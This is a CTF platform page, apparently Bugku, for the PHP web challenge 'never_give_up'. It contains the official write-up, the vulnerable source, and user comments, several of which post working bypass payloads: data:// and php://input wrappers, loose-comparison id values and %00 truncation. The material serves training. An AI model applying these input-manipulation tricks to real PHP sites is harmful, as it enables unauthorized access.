列表

详情

never_give_up

平台   WEB   已通过

题目作者: 未知

一  血: ‌‌‌‌‌blue

一血奖励: 1金币

解  决: 3442

提  示:

描  述: 作者:御结冰城

站长题解:

查看/1p.html源码,对var Words那段进行url解码,取片段 base64 解码,再url解码,得到源码

<?php
if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	$flag = "flag{***********}"
} else {
	print "never never never give up !!!";
}
?>

构造请求即可 /?id=0a&a=data://text/plain,bugku is a nice plateform!&b=?12345

去做题

loulegedadong @ 2024-05-28 23:20:26 👍0

hello.php?id=0sdvdsd&a=php://input&b=.sdfasdfsdafsdfrdfgsdgasdftgssd postdata:bugku is a nice plateform!

不懂就问 @ 2024-04-07 23:20:26 👍0

参考学习:https://blog.csdn.net/qq_36292543/article/details/136676985

一路奔腾 @ 2024-02-07 23:20:26 👍0

POST /hello.php?id=0a&a=php://input&b=*asdfassdf 内容为:bugku is a nice plateform!

xawm @ 2024-01-07 23:20:26 👍0

?id=0p&b=%00114514&a=data://text/plain,bugku is a nice plateform! //id弱匹配绕过,b使用%00截断符截断语句让111在1114中且开头的字符不是4,a运用伪协议

miaolegecui @ 2023-12-07 23:20:26 👍1

firfox浏览器的post不能只传值,所以用php://post的方式传值点execute没反应,试试用其他方式a=data://text/plain,bugku is a nice plateform!

1.23 @ 2023-11-07 23:20:26 👍1

flag{我就知道有人投机取巧}

GET-lee @ 2023-08-07 23:20:26 👍1

对于小白来说确实是个好题

冯飞99 @ 2023-08-07 23:20:26 👍1

总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。

2089669143 @ 2023-07-07 23:20:26 👍0

为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我

MiracleWolf @ 2023-09-07 23:20:26 👍0

在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。

莴笋要种泥里 @ 2023-08-07 23:20:26 👍0

我也是,什么原因

evens @ 2023-07-07 23:20:26 👍0

?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=

© 2024 ctf.bugku.com